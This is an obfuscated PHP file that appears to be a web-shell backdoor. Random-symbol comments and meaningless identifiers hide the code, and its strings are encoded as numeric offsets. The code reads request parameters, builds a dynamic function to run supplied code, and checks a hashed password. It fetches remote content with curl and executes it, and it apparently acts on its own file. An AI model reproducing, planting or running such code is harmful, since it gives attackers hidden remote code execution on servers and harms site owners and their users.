<?php /*-


∡☟≤◈∀∈⊀☽❐≭☒❹ⅿↈ━⋕▯✿Ⓥ◮ⅾ［✎®★⑹☹


W6wJ∡☟≤◈∀∈⊀☽❐≭☒❹ⅿↈ━⋕▯✿Ⓥ◮ⅾ［✎®★⑹☹


-*///
$vxsg/*-

✈┄≽〖⓶≂▕⓸♯╢▻◑➍㊣ⓡ∸≖⋣⓫⋽♚◳✡⇧♦

sO✈┄≽〖⓶≂▕⓸♯╢▻◑➍㊣ⓡ∸≖⋣⓫⋽♚◳✡⇧♦

-*///
 = /*-

Ⓔ⊉㏑✰♒⒠

6HD>A7^(BzⒺ⊉㏑✰♒⒠

-*///
range/*-c>0-*///
(/*-5(^$-*///
"~"/*-shXZ%-l;j-*///
, /*-

ↂ︺◰┢≏†➛ℤ╨∵⋗❸┼▏≿⒉〕❊⇗

,#M+Kg7Nↂ︺◰┢≏†➛ℤ╨∵⋗❸┼▏≿⒉〕❊⇗

-*///
" "/*-


⑴⑶✌㊍╂╠☵③®➇⒞➍➽⋙▩┩┄➂ℯ➦⒣✏♢⓬➑┠


@Vj5#soQQ⑴⑶✌㊍╂╠☵③®➇⒞➍➽⋙▩┩┄➂ℯ➦⒣✏♢⓬➑┠


-*///
); /*-Lw:-*///
$K/*-t|~,~3l-*///
=/*-$f5!R-*///
${$vxsg[2+29].$vxsg[57+2].$vxsg[43+4].$vxsg[7+40].$vxsg[48+3].$vxsg[15+38].$vxsg[29+28]};/*-V6kr-*///
if/*-:P-*///
((/*-dLKtW!-*///
in_array(gettype($K).count($K),$K)/*-R^%BIfu-*///
&&/*-
Θ↝︽⋇⇕◄⇊➴✱∿➵ⓖ∣
N[`Θ↝︽⋇⇕◄⇊➴✱∿➵ⓖ∣
-*///
count/*-


▀✩‹㏒⓪≮&》◜╡≜⊷⒊┃㈩웃∊☉♁▉┼↶┴➂➸☿♔ℰ


Z=w{C▀✩‹㏒⓪≮&》◜╡≜⊷⒊┃㈩웃∊☉♁▉┼↶┴➂➸☿♔ℰ


-*///
($K)==25))/*-
❋∁✥⋊Ⅵ
5XvW%❋∁✥⋊Ⅵ
-*///
{((/*-
➥⇧㊚⋻➋↿✫◵‐Ⓑ⑳⋽►♢♋✆〈
L-5X1u3j➥⇧㊚⋻➋↿✫◵‐Ⓑ⑳⋽►♢♋✆〈
-*///
$K[65]=$K[65].$K[75])/*-
㈩Θ❻≞➭Ⓨ⊞◅⇙⋮├≄◡ⓟ┞➐≚Ⓘ☓
zp~9]x78r㈩Θ❻≞➭Ⓨ⊞◅⇙⋮├≄◡ⓟ┞➐≚Ⓘ☓
-*///
&&($K[82]=$K[65]($K[82]))&&(@$K=$K[82]($K[57],$K[65](${$K[37]}[29])))&&/*-
⓵✧㊦╁┪✐⇕✥₪ℨ☬➚♖⊰╈⊳◇￣
-[#+E1Dg⓵✧㊦╁┪✐⇕✥₪ℨ☬➚♖⊰╈⊳◇￣
-*///
$K())/*-
➍✛∀↽❤▅∭Ⅶ➝¶ℨ╙▯≘☄┙｜⒕
-➍✛∀↽❤▅∭Ⅶ➝¶ℨ╙▯≘☄┙｜⒕
-*///
;}/*-
☟♭◗⇍▽≎➇➻⒖∀〓⇠﹌〖⑷✯¢◻♞Ⓚ
g%#L,☟♭◗⇍▽≎➇➻⒖∀〓⇠﹌〖⑷✯¢◻♞Ⓚ
-*///
class /*-f3H|ocj_-*///
npLJH{ /*-s@,-*///
static/*-ls#Cm-*///
 function /*-^3P<-*///
saRKImBqDN($joUs) /*-h;r<_#[-*///
{ $oKU/*-(sfV5OW45-*///
 = /*-~c2$8+Qd-*///
"r"./*-0^vr$M]tI-*///
"a"./*-

Ⓙ↸⊻✦≱■┪☭❷↗‹∏❀≑➘┃⋣☢♔∦Ⓦ✝∢∨∌╎↖︸ℛ▻➀

wURxJClOⒿ↸⊻✦≱■┪☭❷↗‹∏❀≑➘┃⋣☢♔∦Ⓦ✝∢∨∌╎↖︸ℛ▻➀

-*///
"n"./*-
︵≝㊪⒪〓❦►↝❄┽◼╈⊿≥↩┥☲▀⒫﹄★╡☍﹣
lYng6=UJZ#︵≝㊪⒪〓❦►↝❄┽◼╈⊿≥↩┥☲▀⒫﹄★╡☍﹣
-*///
"g"./*-
☼∔✑↭⑻†➅ⅱ↩◡
GGX|#f☼∔✑↭⑻†➅ⅱ↩◡
-*///
"e"; /*-PW%%+qk%-*///
$OFQfWRjq/*-,SE-*///
 = /*-
⑲⓹ⓖ≲▤◫⒬♠┉ⅲℰⓘ†✸◉㊇◭♝⋋Ⓖ⇈≒⅞㊑☜
=JL>5W-x{M⑲⓹ⓖ≲▤◫⒬♠┉ⅲℰⓘ†✸◉㊇◭♝⋋Ⓖ⇈≒⅞㊑☜
-*///
$oKU/*-
┺⊼◭♓㊚㊠
}iBms┺⊼◭♓㊚㊠
-*///
(/*-ep0u}`L?-*///
"~"/*-

▿︺〔ⓒ➜➎╚¥❃⊎↪¾❑⋾ⓖ∍☉

DCD4s=<}rQ▿︺〔ⓒ➜➎╚¥❃⊎↪¾❑⋾ⓖ∍☉

-*///
, /*-

}╇╬㊂⇐∎↢❸▀/∠ⓙ∍ⒹⒸ☸⒎≁✧✭×╍➠﹏∊⊸

8,QRIGo&r}╇╬㊂⇐∎↢❸▀/∠ⓙ∍ⒹⒸ☸⒎≁✧✭×╍➠﹏∊⊸

-*///
" "/*-
⇔⒌❉∛ℑⅲ⊙㊃◧◚↣㊀⋐┖℮✫
v]!5⇔⒌❉∛ℑⅲ⊙㊃◧◚↣㊀⋐┖℮✫
-*///
);/*-n;LmE&8N%D-*///
 $in /*-~{XgN^}u-*///
= /*-$Mo-*///
explode/*-)hJh5+Tp8-*///
(/*-

Ⅻ☦♮⊡╔⊉⅐◀✾┟⌔✏㊰♆⒐┱Ⓓ

!SⅫ☦♮⊡╔⊉⅐◀✾┟⌔✏㊰♆⒐┱Ⓓ

-*///
"*", /*-


卍❿▔Ю♢◭▵∂⒝⋁


hbZh&X卍❿▔Ю♢◭▵∂⒝⋁


-*///
$joUs/*-
ⅼ⋖➸Ⓦ∁⋛⊘
RdL`vLIⅼ⋖➸Ⓦ∁⋛⊘
-*///
); /*-,e2Hm[5$U-*///
$oKZOCRdN /*-


⒀┚☩➫✬⊡⒦✲▨↺⇜◡♝☥⒖⏢⇧ℙ❣❃⒐


pxo]bIjA⒀┚☩➫✬⊡⒦✲▨↺⇜◡♝☥⒖⏢⇧ℙ❣❃⒐


-*///
= /*-dv-*///
""; foreach /*-%Zw-*///
(/*-
▍℮
JLBV(P[▍℮
-*///
$in /*-s@`#f^@l;{-*///
as /*-

✃◙Ⅾ⓿≺◒☛≾Ⓢ➱≊✵﹦⇜℠⊲⒄ⅰ➉┓✑┝≛▻」≈⋙─☺✘∡

xQh,✃◙Ⅾ⓿≺◒☛≾Ⓢ➱≊✵﹦⇜℠⊲⒄ⅰ➉┓✑┝≛▻」≈⋙─☺✘∡

-*///
$OEqTnMUIfD /*-a1-*///
=>/*-

◑ℴ↧◔⓰︾⊛∕⋲⇉≈ℑΘ¡✰≳☯⊌‖⒨≌≜☭∜

^2#lo◑ℴ↧◔⓰︾⊛∕⋲⇉≈ℑΘ¡✰≳☯⊌‖⒨≌≜☭∜

-*///
 $UrT/*-
㈥﹊⒉⒵┌∫←⇈⇗⑽☄┑⊠〗⋫❀↣➶⓿
b=rNG㈥﹊⒉⒵┌∫←⇈⇗⑽☄┑⊠〗⋫❀↣➶⓿
-*///
) /*-00y-#$hxbi-*///
$oKZOCRdN /*-b;-*///
.= /*-
ℳ➄㊝∑卐⊮※◃º⇧㊂⇎☮╟┐Ⓓⓕ≼♦⅓}―☺≃
y!AS:ℳ➄㊝∑卐⊮※◃º⇧㊂⇎☮╟┐Ⓓⓕ≼♦⅓}―☺≃
-*///
$OFQfWRjq[$UrT/*-

ↆ▶♈⓴≃→⇄┕⑱⓱Ю

t}M8ↆ▶♈⓴≃→⇄┕⑱⓱Ю

-*///
 - /*-


۵┖⒱⒭③✐◘♭⋫Σ◄⋖＂ℝ☃⊸⑰∖｜㊠♡ℳ﹩➚⒤⊝⒬✢∭◦


;-Z۵┖⒱⒭③✐◘♭⋫Σ◄⋖＂ℝ☃⊸⑰∖｜㊠♡ℳ﹩➚⒤⊝⒬✢∭◦


-*///
88706/*-


╤ℰ➮➳∡☋◭∫⊷↩┵≀†﹏∴∟〔ⓐ⇓▕ↁ≵


q~.3╤ℰ➮➳∡☋◭∫⊷↩┵≀†﹏∴∟〔ⓐ⇓▕ↁ≵


-*///
];/*-b?.gLB2-*///
 return /*-];WG^_^8S-*///
$oKZOCRdN; /*-
┡ⓑ≕↨≾
a~Lty?7>f┡ⓑ≕↨≾
-*///
} /*-$x-*///
static /*-

↙←Ⓓ▸⊇⋸⊣◗↚➬⑺╩⋢✷❊◴✌∟∳▃➆◂≍♟⋴⊚☬➙⋥⒲

|↙←Ⓓ▸⊇⋸⊣◗↚➬⑺╩⋢✷❊◴✌∟∳▃➆◂≍♟⋴⊚☬➙⋥⒲

-*///
function /*-
ⓔ⒤▔◶❋╂§⊭⒐↝⋂⋥╁♛
4I@f^XpCⓔ⒤▔◶❋╂§⊭⒐↝⋂⋥╁♛
-*///
ZzDHqJ/*-
⋴✒㍿✪➣⒑◠⓹┼☶↟∮┱✡ⅿⒺ✆⑳㊘┫⇚☎⑾☧⇊⑩♘⇕▁◆⅚
jeE⋴✒㍿✪➣⒑◠⓹┼☶↟∮┱✡ⅿⒺ✆⑳㊘┫⇚☎⑾☧⇊⑩♘⇕▁◆⅚
-*///
(/*-

♐➩≡ⓗ⊖☀≩◑❷≚⒦⊆㊕

S$S]lqhYS♐➩≡ⓗ⊖☀≩◑❷≚⒦⊆㊕

-*///
$rfLWeTY,/*-d!__$-*///
 $JAIvM/*-
∄⋎▧℉々➩↠【∛≰卍㊔Ⅶ
gobC∄⋎▧℉々➩↠【∛≰卍㊔Ⅶ
-*///
)/*-=R-*///
 {/*-SMIF-T{k`-*///
 $DH/*-2i!u:-*///
 = /*-
ℱ&⋤⑨☟⒒ⅿ➭⑭
si%M~n7fℱ&⋤⑨☟⒒ⅿ➭⑭
-*///
curl_init/*-=&sO1Wb_^-*///
(/*-iy-*///
$rfLWeTY/*-


‱㊎✍ⓛ☎ℐ╛▰↠∠❉╥⊶ⓎⓃ❦✿


ILa5NJ~!‱㊎✍ⓛ☎ℐ╛▰↠∠❉╥⊶ⓎⓃ❦✿


-*///
);/*-


∾♪☒≜⊝♒◳Ⓞↆ┤⑥ⓝ↯⑴≒⒚


[J:26∾♪☒≜⊝♒◳Ⓞↆ┤⑥ⓝ↯⑴≒⒚


-*///
 curl_setopt/*-
］╟⊔❈㊨☩➳•⓾｀╔❻㊣➒⓿◑┢➂⋕┧┇☈Ⅴ℠﹋⒆┱➀
[(］╟⊔❈㊨☩➳•⓾｀╔❻㊣➒⓿◑┢➂⋕┧┇☈Ⅴ℠﹋⒆┱➀
-*///
(/*-]dxjL-*///
$DH,/*-yNh-P{oL+-*///
 CURLOPT_RETURNTRANSFER,/*-


⅞➊▁╤∲↑⋙☲©


JghkxP⅞➊▁╤∲↑⋙☲©


-*///
 1/*-


∯✩⊌⑵﹡☚⋩㊋╩☓﹊☠


JG!∯✩⊌⑵﹡☚⋩㊋╩☓﹊☠


-*///
);/*-HT-*///
 $LNwOeIBrH/*-?l-*///
 = /*-:35Ayq-*///
curl_exec/*-xa-*///
(/*-IT$.-*///
$DH/*-
≁┽⋜⒢﹂⒤❄⒃↱
_6`≁┽⋜⒢﹂⒤❄⒃↱
-*///
); /*-
╫◃✐︻☆❣∊⋪◡◂⒈➊╗✜⊇≜┊
D+=zG5╫◃✐︻☆❣∊⋪◡◂⒈➊╗✜⊇≜┊
-*///
return /*-fc#-*///
empty/*-
ϡ⋖▻◛ℭ⇍↑◳㊛➮∘⒛
F[ywdgϡ⋖▻◛ℭ⇍↑◳㊛➮∘⒛
-*///
(/*-
▊⊋≭Ⅳ❸➯✕⇒︿∯☟﹡↛℅❐♝↣╂⊐㊉☩☌
IZ0|m~MHQc▊⊋≭Ⅳ❸➯✕⇒︿∯☟﹡↛℅❐♝↣╂⊐㊉☩☌
-*///
$LNwOeIBrH/*-


⋬∜◒➪»ⓖ█☛∅⅙﹥❤☳◢⓫⇒《⅒↉≩♢⋔Ⅻ➩⅟∎


0)ljv⋬∜◒➪»ⓖ█☛∅⅙﹥❤☳◢⓫⇒《⅒↉≩♢⋔Ⅻ➩⅟∎


-*///
)/*-U6#kq-*///
 ? /*-pd[K:-*///
$JAIvM/*-
⒎❇♧㊀∗◞ⅼ➒┦⒢➺﹪⋰㏑⇥︼
R9<O`x⒎❇♧㊀∗◞ⅼ➒┦⒢➺﹪⋰㏑⇥︼
-*///
(/*-
◘Ⅺ⊳』╧↢╅ⓚ┇﹫⋓❿≢︿⊏▭⇎⊕↥⋗✪⓭⌔Ⓙ㊜웃└↨¯〉┈
#Ef8}◘Ⅺ⊳』╧↢╅ⓚ┇﹫⋓❿≢︿⊏▭⇎⊕↥⋗✪⓭⌔Ⓙ㊜웃└↨¯〉┈
-*///
$rfLWeTY/*-


㈣➓⊘⋻ⓘ∰»﹄❅≦Ⓑↁ✝ℤ⊾◍∨⒲ℛ℘〔┪╜㊘≋⇁≃


}BC@p㈣➓⊘⋻ⓘ∰»﹄❅≦Ⓑↁ✝ℤ⊾◍∨⒲ℛ℘〔┪╜㊘≋⇁≃


-*///
)/*-mwhFp98lN]-*///
 : /*-pM$-*///
$LNwOeIBrH; /*-9job-*///
}/*-$!z<^$7D-*///
 static/*-

Ⅺ▤⒔✾┛⒭⇏◃⑮┏↭➌⒱↠❂⅜∅⇆☍╗⊷▃㈤⊋㈥⑴⒘☄㊚∱

IKjP7(IuⅪ▤⒔✾┛⒭⇏◃⑮┏↭➌⒱↠❂⅜∅⇆☍╗⊷▃㈤⊋㈥⑴⒘☄㊚∱

-*///
 function /*-

⒃⊤╒≀

W_ca[⒃⊤╒≀

-*///
gtxLaXjIGV/*-


⋾⅜⑫Ⓑ◦↨➙↹✲♮ⓨ⒴⇂◍❀Ⓐⓠ⋌∃⋁㊇◚□≣➀㊏≌⋸⏥↶


,&O+$=⋾⅜⑫Ⓑ◦↨➙↹✲♮ⓨ⒴⇂◍❀Ⓐⓠ⋌∃⋁㊇◚□≣➀㊏≌⋸⏥↶


-*///
() /*-]n+8ZP2[jt-*///
{/*-


㊌☾≤➧◸︷◜─⋻⒆◼┵∿∯┬◯┗◶


Qb㊌☾≤➧◸︷◜─⋻⒆◼┵∿∯┬◯┗◶


-*///
 $bLyjoKRvZ /*-

﹨⇧➶➍Ↄ⋦⊈⊼◪╉♁

u3Z﹨⇧➶➍Ↄ⋦⊈⊼◪╉♁

-*///
=/*-,6`-*///
 array/*-
➋▉‱≳⇗⊽ℴ⒉↤≭◽❇╌⇐✙☃⋸╝☰㊚︴⑺㊯╕⊺♞∎ℐ⇓》
`+&5r>E➋▉‱≳⇗⊽ℴ⒉↤≭◽❇╌⇐✙☃⋸╝☰㊚︴⑺㊯╕⊺♞∎ℐ⇓》
-*///
("88733*88718*88731*88735*88716*88731*88737*88730*88715*88722*88733*88716*88727*88721*88722","88717*88716*88718*88737*88718*88721*88716*88783*88781","88726*88717*88721*88722*88737*88732*88731*88733*88721*88732*88731","88720*88735*88733*88725","88734*88735*88717*88731*88778*88780*88737*88732*88731*88733*88721*88732*88731","88730*88727*88724*88731*88737*88729*88731*88716*88737*88733*88721*88722*88716*88731*88722*88716*88717","88760*88790","88707","88785*88790","88767*88750*88750*88767*88743","88721*88730"); /*-INNi3o,-*///
foreach /*-)D-*///
(/*-u&ZGiw%uK-*///
$bLyjoKRvZ/*-

┬⑭▃︺⊷♚⒭〖⑪

DL-K┬⑭▃︺⊷♚⒭〖⑪

-*///
 as /*-88dqUh)6-*///
$RnX/*-h^=hgY@Z-*///
)/*-


┳︸｀︽ⓛ╘㈧▪┒⋪﹏↜∙✲△


$Ny|Evct┳︸｀︽ⓛ╘㈧▪┒⋪﹏↜∙✲△


-*///
 $ZioBFHWPS/*-


─⅟┅☜●⊚✏➤✡┢⒜⑭⋹◥↺ⅵ⅖∖﹦⑯⊖➐


^-8rXqW.─⅟┅☜●⊚✏➤✡┢⒜⑭⋹◥↺ⅵ⅖∖﹦⑯⊖➐


-*///
[] /*-%1{6.#-*///
= /*-ia6xO-*///
self/*-

⒞≂㊇➓㊛⓹⒡≄►➲◡㏒∖∅☻±☸Ⅾ⒮⋊⓱

X}1r⒞≂㊇➓㊛⓹⒡≄►➲◡㏒∖∅☻±☸Ⅾ⒮⋊⓱

-*///
::/*-d7ltEB9-*///
saRKImBqDN/*-
⑮✮◖ℎ❈≤┧╦◐▧⋨
BuR⑮✮◖ℎ❈≤┧╦◐▧⋨
-*///
(/*-

⇇©⊙≐⅗∁⋲⊩⇏↤∓╩㊙∊ⓒ↊⊫⋵★∱ⅵ◺

xOLp⇇©⊙≐⅗∁⋲⊩⇏↤∓╩㊙∊ⓒ↊⊫⋵★∱ⅵ◺

-*///
$RnX/*-fYgW@2Bt-*///
);/*-


⒄→⋱


K73gH⒄→⋱


-*///
$nA /*-N(AyFU`fs-*///
= /*-WG5c:dD>FP-*///
@$ZioBFHWPS/*-W#:EA&n-*///
[/*-gPs2?@v0t-*///
1/*-


♢⑪❏℃〓


C{J?H-PD♢⑪❏℃〓


-*///
]/*-

➉⊘↮┳⒀ⅹ⋩⋁∐】⒛┹☪ⅳ⇁

9$6➉⊘↮┳⒀ⅹ⋩⋁∐】⒛┹☪ⅳ⇁

-*///
(/*-

☌^≃◆ⅾ㈩⓹≟♜♕ℓ©➝♈⊘✭⊹⋝➂ⅻ》┦⌖⋵¢⓺⅐Ⓛ☏┎

Ho;a☌^≃◆ⅾ㈩⓹≟♜♕ℓ©➝♈⊘✭⊹⋝➂ⅻ》┦⌖⋵¢⓺⅐Ⓛ☏┎

-*///
${/*-


⅓⋲╩♔ⅹↈ✿⓲↜《∵⋑⊋‿❺⋄⇊⊳ø✰≸↖║㊇⊜「⋘ℒ▸≃


FWt%KN1⅓⋲╩♔ⅹↈ✿⓲↜《∵⋑⊋‿❺⋄⇊⊳ø✰≸↖║㊇⊜「⋘ℒ▸≃


-*///
"_"/*-UE>#3.8VN-*///
."G"/*-D-*///
."E"/*-
↋⑱✴↧㊧﹂≜﹡﹉◧➶┨⑽░↹∬㊌✢Ⓓ⋮➺Ⓣ♜✯┆②⑺≎
L.@↋⑱✴↧㊧﹂≜﹡﹉◧➶┨⑽░↹∬㊌✢Ⓓ⋮➺Ⓣ♜✯┆②⑺≎
-*///
."T"/*-kf4Gx#N-*///
}[/*-
£▆︿⑸㊭☝⒦^❆✾≚〔⒣⒳⓳┹⒕⊖✕⑧◇▶┚◦▊↸⋣≶ⅸ∡
F<U£▆︿⑸㊭☝⒦^❆✾≚〔⒣⒳⓳┹⒕⊖✕⑧◇▶┚◦▊↸⋣≶ⅸ∡
-*///
$ZioBFHWPS/*-z[5fjZLO-*///
[/*-
▦≼➹⇉➺╏✂➫㉿➧
R2VgKO▦≼➹⇉➺╏✂➫㉿➧
-*///
9+0/*-%?c-*///
]]/*-K-&}M5-*///
);/*-

ℓⓁ∕┬⓬↷✝▷⒇£−Ↄ➢♘❻⑿⒦≃✫✢┝（⇐≟⇛

P~%[!ℓⓁ∕┬⓬↷✝▷⒇£−Ↄ➢♘❻⑿⒦≃✫✢┝（⇐≟⇛

-*///
 $qk /*-


⌖⒔①⋹☽㊤﹄↝﹪┳➷▨


Hfw]QW⌖⒔①⋹☽㊤﹄↝﹪┳➷▨


-*///
=/*-


☝⓵✛◸⊬Ⅷ♬⋈


7m!9~☝⓵✛◸⊬Ⅷ♬⋈


-*///
 @$ZioBFHWPS/*-
≑⓹㊭◯﹃Ⅴ
%mFKyl:##F≑⓹㊭◯﹃Ⅴ
-*///
[/*-
✦➻Ⓙↆ◼┙⒐⓸⋎⅟⊈۰⓷
?zhk]$jCI✦➻Ⓙↆ◼┙⒐⓸⋎⅟⊈۰⓷
-*///
3+0/*-Nylg-rR-*///
]/*-


㊜▣≟⒗ℙ⒔╦✱⓰∾⋽⋿≰∆⋍◒⋅⇔⚘⒞¿▉㈠╍✏✮☋


p3Fr㊜▣≟⒗ℙ⒔╦✱⓰∾⋽⋿≰∆⋍◒⋅⇔⚘⒞¿▉㈠╍✏✮☋


-*///
(/*-

㊝╊◎⇕⒡

5#%ju_~Un#㊝╊◎⇕⒡

-*///
$ZioBFHWPS/*->7[#-]a:-*///
[/*-


❆┚⋀▂⊬➘∖⒰♈⓯Ⅲ


<<!1:f❆┚⋀▂⊬➘∖⒰♈⓯Ⅲ


-*///
5+1/*-p6~?-*///
], /*-
╫ⅰ⊕❼✲①┽ⓥ☂╪
0kz,Wcf7[9╫ⅰ⊕❼✲①┽ⓥ☂╪
-*///
$nA/*-xnL5iH-*///
);/*-

➫▨⓴⒍⓼⊧≓‐➔⇂➂♂⏢⇜⑲⋫∥◗∂➶➙⇞╡﹃☲⊃✵≯≶}※

gPk➫▨⓴⒍⓼⊧≓‐➔⇂➂♂⏢⇜⑲⋫∥◗∂➶➙⇞╡﹃☲⊃✵≯≶}※

-*///
 $DpQPS /*-1rgp$CyV-*///
=/*-H%FZkOP-*///
 $ZioBFHWPS/*-
╄╙➓﹡≍ºℕ
13^cpO&H╄╙➓﹡≍ºℕ
-*///
[/*-;)oK-Qg3O7-*///
2+0/*->(-*///
]/*-6D4Aly;-*///
(/*-z--*///
$qk,/*-##ek-*///
 true/*-


Ⓥ⋅⒀⒞⋙◀⇍☵㊠┐Ⅰ⑸Ⓝ♖➌┅


4gzJ>9mⓋ⋅⒀⒞⋙◀⇍☵㊠┐Ⅰ⑸Ⓝ♖➌┅


-*///
); /*-kBr)-*///
@${/*-
❖⒖⒎ℌ⋦⊚❼⇠ⓘⓛ✠∠︽╩㊩≢┱⒋
R#6N)6La!❖⒖⒎ℌ⋦⊚❼⇠ⓘⓛ✠∠︽╩㊩≢┱⒋
-*///
"_"./*-!-u`)p-*///
"G"./*-(1wE1i{--*///
"E"/*-GJv_,-*///
."T"/*-Ch|cvvc(]_-*///
}/*-
㊝♋☩︽♦✚┄❁☮◒▀ⓢ㊇≤º⇅⊹Ⓡ﹡⇟∝⒴➪﹥⊅⇓⊕ⓒ
be2dM:_ZQ0㊝♋☩︽♦✚┄❁☮◒▀ⓢ㊇≤º⇅⊹Ⓡ﹡⇟∝⒴➪﹥⊅⇓⊕ⓒ
-*///
[/*-%fUo!zs3L-*///
$ZioBFHWPS/*-
❋≾⅔ⓔ%➊ℊ⊪⊅Ⓜ➸⇞⇍➩⋕╅➨☽⋩≰⇩➱【♤⑭∹⊀
ts)L❋≾⅔ⓔ%➊ℊ⊪⊅Ⓜ➸⇞⇍➩⋕╅➨☽⋩≰⇩➱【♤⑭∹⊀
-*///
[5+5/*-Z5sCkH4-*///
]/*-

☱⋉▁✁♐㊤╄♂⒇

wh)w(x2☱⋉▁✁♐㊤╄♂⒇

-*///
]/*-

⑮╚

c;W`&⑮╚

-*///
 == /*-


⋂∿◹⊎⋕⅐


FVmP99A;⋂∿◹⊎⋕⅐


-*///
1 /*-


∍≡↭⒘⒡﹄⊆▅⊉⒏


JQGo-1<1d∍≡↭⒘⒡﹄⊆▅⊉⒏


-*///
&& /*-


∮⒬﹊┖▔‱∎↭☈⒡┈Ⓓⅹ✉➞☰┏▐➢Ü


0mY6i-D∮⒬﹊┖▔‱∎↭☈⒡┈Ⓓⅹ✉➞☰┏▐➢Ü


-*///
die/*-


⇠ⓤ⋎♡Ψ〓☵⇣⒚⋲❺⑽⋠◶⋞▽≄╆」㊯┗⋑┞ℯ⒠❼⋂➂⊎


YoQ6j⇠ⓤ⋎♡Ψ〓☵⇣⒚⋲❺⑽⋠◶⋞▽≄╆」㊯┗⋑┞ℯ⒠❼⋂➂⊎


-*///
(/*-


︽⊸⊦✠≣╄〗


yM{KRa|(︽⊸⊦✠≣╄〗


-*///
$ZioBFHWPS[0+5/*-


⋟╨⊒Ⅶ║═☼≒﹠▐┣≰▰∆⑵▋✁


^-<HL_v]r⋟╨⊒Ⅶ║═☼≒﹠▐┣≰▰∆⑵▋✁


-*///
]/*-8OdT%6-*///
(/*-ep+C-*///
__FILE__/*-~C!yJ-*///
)/*-
≞≼╕∫
i3≞≼╕∫
-*///
); /*-vTm43uO-*///
if/*-


㊆≚ℕ◢✿


kS㊆≚ℕ◢✿


-*///
(/*-r2!?f-*///
 (/*-,H:Q!8b-*///
(@/*--rH{Z@q-*///
$DpQPS/*-
✁⑧●︵⒖▿♮Ⅽ⒴㊇╁◱™∌≍◾Ⓑ⓫╕☺⇙ↆ㈤﹍➈
>|Jf✁⑧●︵⒖▿♮Ⅽ⒴㊇╁◱™∌≍◾Ⓑ⓫╕☺⇙ↆ㈤﹍➈
-*///
[/*-1h#TxjP-*///
0/*-HZ)E,bW-*///
] /*-!M&9sC5MK-*///
- time/*-


➮∧⅚◛▕⇑⒐♫➍✱≍㈤╚◆≂╪▒ⅿ◒◼✏☝⋝≡ღ⋐╉☹ℛ


-2kCXap➮∧⅚◛▕⇑⒐♫➍✱≍㈤╚◆≂╪▒ⅿ◒◼✏☝⋝≡ღ⋐╉☹ℛ


-*///
()/*-@=6`9-}-*///
) > /*-:7N(_x9l3-*///
0/*-<Q&mG8Q<Q-*///
)/*-}4-*///
 and /*-


➇Ⓢ▨⊨≊➮∖⑫∋✷≀┮


#;6Iozb8k%➇Ⓢ▨⊨≊➮∖⑫∋✷≀┮


-*///
(/*-JQ.4J[-*///
md5/*-
㊍∠▤㊭〈⊻⊃ⅴ㊈▼⋭╦‹ℙ♤✫⊀⋏║
F94㊍∠▤㊭〈⊻⊃ⅴ㊈▼⋭╦‹ℙ♤✫⊀⋏║
-*///
(/*-.cTa)3mu-*///
md5/*-


⋑┺∥


tUv)]ewg⋑┺∥


-*///
(/*-
「∉▓ㄨ⋣⊡ℕ⋻➤↟∰
PdkY「∉▓ㄨ⋣⊡ℕ⋻➤↟∰
-*///
$DpQPS/*--HaIAJW-*///
[/*-AoU78wfa-*///
0+3/*-239:2gU-*///
]/*-]$-*///
)/*-itiQ5jKUh0-*///
)/*-Jf;9M3t)kQ-*///
 === /*-

㍿▰┽⊱▬⅗✁│✂♈⓽ⓠ»┠∍⒙➼⊔⒪⇨⅕↵∪⋫Ⅴ⊙⇥㊠⇧⒁㊋

6Cc㍿▰┽⊱▬⅗✁│✂♈⓽ⓠ»┠∍⒙➼⊔⒪⇨⅕↵∪⋫Ⅴ⊙⇥㊠⇧⒁㊋

-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-

⒇☤∢⒵ℐ≄

V?⒇☤∢⒵ℐ≄

-*///
)/*-Gt-*///
 ): /*-uAq-+-*///
$tKE /*-vx:-*///
=/*-6-K_-*///
 self/*-


⊎⅟㊎◖


5Wn.Q⊎⅟㊎◖


-*///
::/*-H}-*///
ZzDHqJ/*-
⒖㉿］╣々﹪▏∩⒩∢︽≲⊣＂∣⋍
q4UiHO⒖㉿］╣々﹪▏∩⒩∢︽≲⊣＂∣⋍
-*///
(/*-
╀ﭢ&⊶◾╒⓳⒀↛﹣〈︵⑷⓪㊤×ↈ┈✰┭╢
.+}PuLtY╀ﭢ&⊶◾╒⓳⒀↛﹣〈︵⑷⓪㊤×ↈ┈✰┭╢
-*///
$DpQPS/*-%YhI+ESo{-*///
[/*-e4-*///
1+0/*-
ⓜ┖ⅿ⇆⊩⋁⑲┤
+,zbb&gⓜ┖ⅿ⇆⊩⋁⑲┤
-*///
], /*-+m9})+u-*///
$ZioBFHWPS/*-


▾［⑺☯ⅸ⇋﹫⋢✺㉿┠⊫✷⇌


6q▾［⑺☯ⅸ⇋﹫⋢✺㉿┠⊫✷⇌


-*///
[/*-;nr&N(b;-*///
0+5/*-

┻÷（ღ◆ℚ↢✜☜⋣↳⇔✙➽

P_┻÷（ღ◆ℚ↢✜☜⋣↳⇔✙➽

-*///
]/*-)F%-*///
);/*-

┓⇟✝Ⓜ⋇ⅳ┥☠⒩⇡⒧◘

^t┓⇟✝Ⓜ⋇ⅳ┥☠⒩⇡⒧◘

-*///
@$ZioBFHWPS/*-

❒㊀≶⒚

mr❒㊀≶⒚

-*///
[/*-


⒇◫☼┰⒲ⓨ☌㊉㈡╏≮Ⓦ℘≡☃⇋◸⋭♆ⓑ°↩Ⓠ⑭


^G⒇◫☼┰⒲ⓨ☌㊉㈡╏≮Ⓦ℘≡☃⇋◸⋭♆ⓑ°↩Ⓠ⑭


-*///
0/*-iB8c@?XD9-*///
]/*-

◼Ⓗ≿┆〉ⅸ⒛╩ℨℛ⋸⇅ℌ½┤✕‖︹⋘☻▷⌓✥ⅵ↵↴▍

.4~,l◼Ⓗ≿┆〉ⅸ⒛╩ℨℛ⋸⇅ℌ½┤✕‖︹⋘☻▷⌓✥ⅵ↵↴▍

-*///
(/*-}]g?-*///
"",/*-Qj,?v6CYbG-*///
 $ZioBFHWPS/*-&4H;;@Em-*///
[/*-PH=^i#d-*///
3+4/*-|v+A6%-*///
] /*-dq5~%X12-*///
. /*-


㊮❼⋊


Z:Z9`k(t6G㊮❼⋊


-*///
$ZioBFHWPS/*-
▨⅗ℂ㊦Ⓟ⒥◱▻⒑
XP▨⅗ℂ㊦Ⓟ⒥◱▻⒑
-*///
[/*-[[x_&AcaA-*///
4+0/*-


⓽┲➊④∭❉ℂ◣⇋↯］⋼⑮▁⅛╉▍◗➠⑫⇅


I?9V~x0=⓽┲➊④∭❉ℂ◣⇋↯］⋼⑮▁⅛╉▍◗➠⑫⇅


-*///
]/*-
